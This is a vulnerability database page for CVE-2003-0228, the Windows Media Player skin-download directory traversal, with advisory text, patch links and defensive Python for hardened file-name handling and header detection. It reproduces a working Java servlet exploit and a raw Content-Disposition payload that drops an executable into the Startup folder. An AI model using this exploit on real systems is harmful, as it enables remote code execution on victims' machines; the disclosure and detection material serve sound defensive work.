CVE-2003-0228
CVSS 7.5
Published: 2003-05-27 00:00:00
Revised: 2016-10-17 22:31:01

[Original] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location.


[CNNVD] Windows Media Player Skin Download Code Execution Vulnerability (MS03-017) (CNNVD-200305-070)

        
        Microsoft Windows Media Player is a media player that supports "skins" to change its appearance. A skin consists of one or more files organized by an XML file; the XML file tells Windows Media Player how to use those files to present the player to the user.
        Windows Media Player does not handle downloaded skin files correctly. A remote attacker can exploit this flaw from a malicious web page to place an arbitrary file at an arbitrary location on the target system.
        When Internet Explorer encounters a document with the MIME type "application/x-ms-wmz", it launches wmplayer.exe with the "/layout" command-line option, which instructs Media Player to download the skin file from the given URL into Media Player's skin directory. To defeat some Internet-based attacks, the program puts a random element in the download path so that an attacker cannot guess the name of the downloaded skin file.
        Media Player has a flaw: this protection can be bypassed with hex-encoded backslashes (%5C) in the URL. An attacker who can supply a malicious URL and lure a user into visiting it can therefore choose the folder the file is downloaded to.
        If the file name does not end in ".WMZ", Media Player normally appends that extension, but by crafting the Content-Disposition HTTP header in a particular way this restriction can also be bypassed and the extension chosen freely. Combining these two issues, an attacker can place an arbitrary file at an arbitrary location on the victim's system, for example an executable in the Startup folder, which runs at the user's next logon.
        An attacker can lure a user with a malicious web page or a malicious HTML e-mail that starts the skin download and so triggers the vulnerability.
        If the user runs Outlook Express 6.0 or Outlook 2002, or Outlook 98/2000 with the Outlook Email Security Update (http://office.microsoft.com/Downloads/2000/Out2ksec.aspx), the attack will not execute automatically from e-mail.
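The two-step bypass above (encoded backslashes choosing the directory, a NUL byte before ".wmz" choosing the extension) can be reproduced in a small model of the file-name handling. The example below is added here; it is not Microsoft's code and not the MS03-017 fix. `DOWNLOAD_DIR` is a hypothetical skin download directory (the page does not name the real one), `vulnerable_target` is a reconstruction of the behaviour the advisory describes, and `hardened_target` is one way a client should validate the name instead. The sample headers are constructed from the exploit header quoted later on this page.

```python
import ntpath
import re
from urllib.parse import unquote

# Hypothetical skin download directory. The page does not name the real one;
# this one sits four levels below the drive root so that the four "..\" hops
# in the published exploit header resolve to C:\ as they did on Windows XP.
DOWNLOAD_DIR = r"C:\Documents and Settings\user\Local Settings\Temp"

# Constructed sample Content-Disposition values (not captured traffic).
BENIGN_HEADER = 'attachment; filename="blue.wmz"'
EXPLOIT_HEADER = ("filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c"
                  "Documents%20and%20Settings%5CAll%20Users%5CStart%20Menu"
                  "%5CPrograms%5CStartup%5csomefile.exe%00.wmz")

_FILENAME_RE = re.compile(r'filename\s*=\s*"?([^";]*)"?', re.IGNORECASE)


def filename_param(header):
    """Return the raw (still percent-encoded) filename parameter, or ''."""
    m = _FILENAME_RE.search(header)
    return m.group(1) if m else ""


def vulnerable_target(header, download_dir=DOWNLOAD_DIR):
    """Model of the pre-MS03-017 behaviour described in the advisory text:
    decode the name, make sure it ends in .wmz, then hand it to a C-string
    file API (which stops at the first NUL) relative to the skin directory.
    This is a model written for this page, not Microsoft's code."""
    name = unquote(filename_param(header))
    if not name.lower().endswith(".wmz"):
        name += ".wmz"
    name = name.split("\x00", 1)[0]          # NUL truncation drops ".wmz"
    return ntpath.normpath(ntpath.join(download_dir, name))


class UnsafeSkinName(ValueError):
    """Raised when a Content-Disposition filename fails validation."""


def hardened_target(header, download_dir=DOWNLOAD_DIR):
    """Hardened handling (added here, not Microsoft's actual fix): reject
    control bytes, accept only a bare file name, fix the extension after
    decoding, and confirm the final path stays inside download_dir."""
    name = unquote(filename_param(header))
    if not name or any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise UnsafeSkinName("empty name or control character in filename")
    # Any slash, backslash or drive prefix changes the basename -> reject.
    if ntpath.basename(name.replace("/", "\\")) != name or name in (".", ".."):
        raise UnsafeSkinName("directory components in filename")
    if not name.lower().endswith(".wmz"):
        name += ".wmz"                        # extension decided after decoding
    base_dir = ntpath.normpath(download_dir)
    target = ntpath.normpath(ntpath.join(base_dir, name))
    if ntpath.commonpath([target, base_dir]) != base_dir:
        raise UnsafeSkinName("resolved path escapes download directory")
    return target


if __name__ == "__main__":
    print("benign  :", vulnerable_target(BENIGN_HEADER))
    print("exploit :", vulnerable_target(EXPLOIT_HEADER))
    try:
        hardened_target(EXPLOIT_HEADER)
    except UnsafeSkinName as e:
        print("hardened rejects exploit header:", e)
```

The order of checks in `hardened_target` is the point: the extension is enforced on the fully decoded name, so no later decoding or truncation step can change it, and the containment check on the normalized path catches anything the character checks miss.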
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:windows_media_player:7.1    Microsoft windows_media_player 7.1
cpe:/a:microsoft:windows_media_player:xp     Microsoft windows_media_player xp

- OVAL (technical details for detection)

oval:org.mitre.oval:def:321    Windows Media Player Directory Traversal
*OVAL describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical detail.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0228
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0228
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-070
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105232913516488&w=2
(UNKNOWN)  BUGTRAQ  20030507 Windows Media Player directory traversal vulnerability
http://marc.info/?l=bugtraq&m=105240528419389&w=2
(UNKNOWN)  BUGTRAQ  20030508 why i love xs4all + mediaplayer thingie
http://marc.info/?l=ntbugtraq&m=105233960728901&w=2
(UNKNOWN)  NTBUGTRAQ  20030507 Windows Media Player directory traversal vulnerability
http://www.kb.cert.org/vuls/id/384932
(UNKNOWN)  CERT-VN  VU#384932
http://www.microsoft.com/technet/security/bulletin/ms03-017.asp
(VENDOR_ADVISORY)  MS  MS03-017
http://www.securityfocus.com/bid/7517
(VENDOR_ADVISORY)  BID  7517
http://xforce.iss.net/xforce/xfdb/11953
(UNKNOWN)  XF  mediaplayer-skin-code-execution(11953)

- Vulnerability info

Windows Media Player Skin Download Code Execution Vulnerability (MS03-017)
High risk    Input validation
Published: 2003-05-27 00:00:00    Updated: 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * Outlook Express 6.0 and Outlook 2002 open HTML mail in the Restricted sites zone by default. Users of Outlook 98 and 2000 should install the Outlook E-mail Security Update, which applies the same setting so that an HTML message cannot start the skin download automatically. This blocks the e-mail vector only; it does not fix the player, and a link to a malicious web page still triggers the flaw:
        
        http://office.microsoft.com/downloads/2000/Out2ksec.aspx

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released security bulletin MS03-017 and the corresponding patch:
        MS03-017: Flaw in Windows Media Player Skins Downloading could allow Code Execution (817787)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-017.asp

        Patch download:
         * Microsoft Windows Media Player 7.1:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=012F143A-77D1-4F6F-9338-5A6332614532&displaylang=en

         * Microsoft Windows Media Player for Windows XP (Version 8.0):
        
        http://microsoft.com/downloads/details.aspx?FamilyId=E311DF50-0633-4100-AB37-D7A68D51182F&displaylang=en

- Vulnerability info (EDB-ID 22570)

Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability (EDBID:22570)
Platform: windows    Type: remote
Date: 2003-05-07    Verified
Port: 0    Author: Jelmer Kuperus
source: http://www.securityfocus.com/bid/7517/info

Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means. 

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import java.io.*;

/**
 *
 * Microsoft media player 8 Exploit for windows XP English and Dutch versions
 *
 * It will drop a file in the startup folder
 *
 * modify web.xml to change what will be uploaded
 *
 * @author Jelmer Kuperus
 *
 */

public class MediaPlayerExploit extends HttpServlet {

    private static final int BUFFER_SIZE = 1024;

    // Traversal prefixes: four "..\" hops (%2e%2e%5c) climb from the skin
    // download directory to the drive root, then descend into the All Users
    // Startup folder of the localized Windows XP install. The backslashes are
    // hex-encoded (%5c) because that is what the unpatched player fails to reject.
    private static final String[] paths = new String[] {
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch
    };

    // Local path of the executable to drop; read from the "executable"
    // init-param in web.xml.
    private String payload;

    public void init() throws ServletException {
        payload = getInitParameter("executable");
        if (payload == null) {
            throw new ServletException("init-param 'executable' is not set in web.xml");
        }
    }

    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

        int language = 0; // default to english

        try {
            language = Integer.parseInt(request.getParameter("language"));
        } catch (NumberFormatException ignored) {}

        if (language < 0 || language >= paths.length) {
            language = 0; // unknown index: fall back to the English layout
        }

        String path = paths[language];

        File file = new File(payload);

        ServletOutputStream sos = response.getOutputStream();

        // Content-Disposition filename = traversal prefix + real name + "%00.wmz".
        // The player sees a name ending in ".wmz" and accepts it, but the NUL
        // terminates the string when the file is written, so the dropped file
        // keeps the executable's own name and extension.
        response.setContentType("application/download");
        response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz");

        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file));
        BufferedOutputStream bos = new BufferedOutputStream(sos);

        try {
            byte buffer[] = new byte[BUFFER_SIZE];

            int datalength = 0;
            while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) {
                bos.write(buffer,0,datalength);
            }
        } finally {
            bis.close();
            bos.close();
        }
    }

    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doGet(request, response);
    }

}
		

- Vulnerability info

7738
Microsoft Windows Media Player Skins File Arbitrary Command Execution
Loss of Integrity Patch / RCS
Vendor Verified

- Vulnerability description

- Timeline

2003-05-07 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability info

Microsoft Windows Media Player Skin File Code Execution Vulnerability
Input Validation Error    BID 7517
Remote: Yes    Local: No
Published: 2003-05-07 12:00:00    Updated: 2009-07-11 09:07:00
Discovery of this vulnerability credited to Jouko Pynnonen of Oy Online Solutions Ltd, Finland and Jelmer.

- Affected versions

Microsoft Windows Media Player XP
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Microsoft Windows Media Player 7.1
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- Not affected versions

Microsoft Windows Media Player 9.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition

- Discussion

Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means.

- Exploit

The following HTTP headers will cause a .exe file to be saved to the Windows Startup folder on Windows XP systems:

Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz

The exploit code for this was provided by "jelmer" <jelmer@kuperus.xs4all.nl>; it is the MediaPlayerExploit servlet reproduced in the EDB 22570 section above.
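The header above is also a good signature for a proxy or IDS to flag: a Content-Disposition filename with traversal sequences, a percent-encoded NUL, or an extension that changes at the NUL. The detection routine below is an added example for this page, not part of the exploit or of any vendor tool. Its sample responses are constructed here (not captured traffic) and it goes slightly beyond the single header on the page by decoding repeatedly, so double-encoded variants (%255c) are caught as well.

```python
import re
from urllib.parse import unquote

# Constructed sample HTTP responses (built for this example, not captured
# traffic). Each is the status line plus headers, as a proxy or IDS sees it.
SAMPLE_RESPONSES = {
    "benign": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/x-ms-wmz\r\n"
        "Content-Disposition: attachment; filename=blue.wmz\r\n\r\n"
    ),
    "ms03-017": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/download\r\n"
        "Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c"
        "Documents%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms"
        "%5CStartup%5csomefile.exe%00.wmz\r\n\r\n"
    ),
    "double-encoded": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/x-ms-wmz\r\n"
        "Content-Disposition: filename=%252e%252e%255cdrop.exe%2500.wmz\r\n\r\n"
    ),
    "no-disposition": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
}

_CD_RE = re.compile(r"^Content-Disposition:\s*(.*?)\r?$",
                    re.IGNORECASE | re.MULTILINE)
_FILENAME_RE = re.compile(r'filename\s*=\s*"?([^";]*)"?', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded traversal sequences are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_response(raw):
    """Return a sorted list of findings for one raw HTTP response header
    block. An empty list means the Content-Disposition filename looks clean
    (or there is none)."""
    m = _CD_RE.search(raw)
    if not m:
        return []
    fm = _FILENAME_RE.search(m.group(1))
    if not fm:
        return []
    name = fully_decode(fm.group(1))
    findings = set()
    if "\x00" in name:
        findings.add("nul-byte")
        # Extension the client checks (after the NUL) vs. the one the file
        # system keeps (before it).
        visible_ext = name.rsplit(".", 1)[-1].lower()
        real_ext = name.split("\x00", 1)[0].rsplit(".", 1)[-1].lower()
        if visible_ext != real_ext:
            findings.add("extension-mismatch:%s-vs-%s" % (real_ext, visible_ext))
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", name):
        findings.add("path-traversal")
    elif "\\" in name or "/" in name or re.match(r"^[A-Za-z]:", name):
        findings.add("path-separator")
    return sorted(findings)


def scan(responses):
    """Map each labelled response to its findings."""
    return {label: inspect_response(raw) for label, raw in responses.items()}


if __name__ == "__main__":
    for label, findings in scan(SAMPLE_RESPONSES).items():
        print("%-15s %s" % (label, findings or "clean"))
```

A plain directory separator without ".." is reported separately from traversal because it is still a sign of a server trying to pick the client's save location, just a weaker one.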

- Solution

Microsoft has released fixes:


Microsoft Windows Media Player 7.1

Microsoft Windows Media Player XP

- References

 

 
